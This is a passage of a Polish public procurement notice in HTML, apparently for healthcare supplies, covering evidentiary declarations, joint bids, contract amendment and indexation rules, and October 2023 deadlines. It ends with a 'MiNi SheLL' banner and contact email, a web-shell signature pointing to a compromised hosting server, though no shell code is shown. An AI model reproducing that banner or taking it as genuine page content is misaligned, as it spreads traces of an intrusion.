dowodowe:<br/>a)	oświadczenie, że oferowany asortyment posiada dokumenty wymagane przez obowiązujące prawo na podstawie których może być wprowadzony do obrotu i stosowania w placówkach ochrony zdrowia RP (Załącznik nr 4 do SWZ).<br/>2.	Jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe są niekompletne, zamawiający wezwie do ich złożenia lub uzupełnienia w wyznaczonym terminie. Przepisu nie stosuje się, jeżeli przedmiotowy środek dowodowy służy potwierdzeniu zgodności z cechami lub kryteriami określonymi w opisie kryteriów oceny ofert lub, pomimo złożenia przedmiotowego środka dowodowego, oferta podlega odrzuceniu albo zachodzą przesłanki unieważnienia postępowania. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Oświadczenie, że oferowany asortyment posiada dokumenty wymagane przez obowiązujące prawo na podstawie których może być wprowadzony do obrotu i stosowania w placówkach ochrony zdrowia RP (Załącznik nr 4 do SWZ). <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokumenty, oświadczenia, podmiotowe lub przedmiotowe środki dowodowe składane wraz z ofertą:<br/>a)	oświadczenie, o którym mowa w art. 125 ust. 1 ustawy PZP w zakresie wskazanym przez Zamawiającego oraz o braku podstaw wykluczenia z postępowania na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego w zakresie wskazanym przez Zamawiającego - zgodnie z wzorem stanowiącym Załącznik nr 3 do SWZ;<br/>b)	w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o którym mowa w pkt. a) każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia składa oddzielnie jako oświadczenie własne.<br/>c)	przedmiotowe środki dowodowe tj. <br/>- oświadczenie, że oferowany asortyment posiada dokumenty wymagane przez obowiązujące prawo na podstawie których może być wprowadzony do obrotu i stosowania w placówkach ochrony zdrowia RP - zgodnie z wzorem stanowiącym Załącznik nr 4 do SWZ<br/>d)	w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania:<br/>- odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru, chyba że Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych a Wykonawca np. w Formularzu ofertowym wskazał dane umożliwiające dostęp do tych dokumentów w odniesieniu do Wykonawcy jak również w odniesieniu do podmiotów udostępniających zasoby;<br/>e)	pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy, chyba że umocowanie do reprezentacji wynika z dokumentów, o których mowa w pkt. d);<br/>f)	pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy (np. umowa o współdziałaniu); pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są do złożenia wraz z ofertą pełnomocnictwa do reprezentowania ich w postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/><br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o których mowa w art. 125 ust. 1 ustawy PZP w zakresie wskazanym przez Zamawiającego, oraz o braku podstaw wykluczenia z postępowania na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, składa każdy z Wykonawców. Oświadczenie to potwierdza brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wybrany Wykonawca zobowiązany jest do zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych we Wzorze Umowy, który stanowi Załącznik nr 1 do SWZ. <br/>2.	Zamawiający przewiduje możliwość zmiany zawartej umowy stanowiącej Załącznik nr 1 do SWZ w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 455 ustawy Prawo Zamówień Publicznych oraz w następujących zakresie i okolicznościach:<br/>1.	Zamawiający dopuszcza zmianę postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, w zakresie:<br/>a)	zmiany asortymentu, w tym zmiany numeru katalogowego, modelu, typu produktu, na asortyment inny, lub poprzez dodanie nowego, o parametrach i funkcjonalności nie gorszych, niż wykazany w ofercie, z zastrzeżeniem, że cena tego asortymentu nie ulegnie podwyższeniu,<br/>b)	zaoferowania w wyniku postępu technologicznego produktu o lepszych parametrach w cenie oferowanej w postępowaniu przetargowym albo niższej, wraz ze zmianą nazwy produktu i numeru katalogowego;<br/>c)	zmiana producenta lub zaprzestanie produkcji przez dotychczasowego producenta z przyczyn niezależnych od Wykonawcy z zastrzeżeniem, że Wykonawca zaoferuje produkt równoważny o takich samych lub lepszych parametrach w cenie oferowanej w postępowaniu przetargowym albo niższej, wraz ze zmianą nazwy produktu i numeru katalogowego;<br/>d)	zmiana przepisów obowiązujących, mających wpływ na realizację niniejszej umowy;<br/>e)	w przypadku zmiany ceny w wyniku zmiany przepisów prawa podatkowego dotyczącej stawek VAT w okresie obowiązywania umowy, przy czym zmiana dotyczyć może wartości brutto, wartość netto pozostaje bez zmian;<br/>2.	Zmiany wymienione w ust. 1 mogą być dokonane na wniosek Wykonawcy, z uzasadnieniem konieczności zmiany, za zgodą Zamawiającego, w terminie do 14 dni od przesłania zawiadomienia, w formie pisemnego aneksu do umowy.<br/>3.	Waloryzacja wynagrodzenia umownego w przypadku zmiany kosztów związanych z realizacją zamówienia, zgodnie z art. 439 ust. 1-4 ustawy Pzp, jest możliwa według następujących zasad:<br/>a)	Po upływie okresu 6 miesięcy (termin początkowy) Zamawiający dopuszcza zmianę wysokości wynagrodzenia (waloryzacja) w sytuacji, gdy ceny jednostkowe określone w załączniku do Umowy wzrosną o co najmniej 20% w porównaniu do cen zakupu asortymentu, o których mowa, względem ceny lub kosztu przyjętych w celu ustalenia wynagrodzenia Wykonawcy zawartego w formularzu asortymentowo-cenowym stanowiącym załącznik nr 1 do umowy,<br/>b)	Wykonawca wnioskujący o dokonanie zmiany wysokości wynagrodzenia przedstawia projekt aneksu do umowy z wykazem rodzaju wszystkich cen brutto zł asortymentu objętego niniejsza umową, uprawniających do żądania zmiany wynagrodzenia wraz z dowodami będącymi podstawą do akceptacji aneksu, tj. kserokopiami faktur zakupu asortymentu przyjętego w celu ustalenia wynagrodzenia Wykonawcy zawartego w ofercie oraz z zakupami tego asortymentu w 6 miesiącu realizacji umowy. We wniosku o zmianę umowy Wykonawca przedstawia także wyszczególnienie ilości asortymentu każdej wykazanej pozycji potrzebnej do końca realizacji umowy;<br/>c)	Jeżeli wartość asortymentu wskazanego w załączniku nr 1 do umowy wzrośnie o co najmniej 20%, w porównaniu do cen przyjętych w celu ustalenia wynagrodzenia Wykonawcy zawartego w ofercie, Zamawiający może wyrazić zgodę na podwyższenie wynagrodzenia o różnicę cen asortymentu wyszczególnionego w Wykazie do aneksu, pomiędzy udowodnionymi wartościami ceny przyjętej w celu ustalenia wynagrodzenia Wykonawcy zawartego w ofercie a wartościami tych cen po upływie 6 miesięcy, a w dalszej kolejności co 6 miesięcy. Podwyższenie wynagrodzenie może nastąpić o wartość różnicy cen asortymentu przyjętego w celu ustalenia wynagrodzenia Wykonawcy zawartego w ofercie a cenami występującymi po 6 miesiącach realizacji umowy, pomnożoną o potrzebne ilości materiałów i kosztów do końca realizacji umowy...<br/>Ze względu na ograniczoną liczbę znaków szczegółowy zakres zmian został określony w SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-10-05 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem zakładki „Oferty/wnioski”, widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy. Po wybraniu przycisku „Złóż ofertę” system prezentuje okno składania oferty umożliwiające przekazanie dokumentów elektronicznych, w którym znajdują się dwa pola drag&amp;drop („przeciągnij” i „upuść”) służące do dodawania plików.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-10-05 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-11-03</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com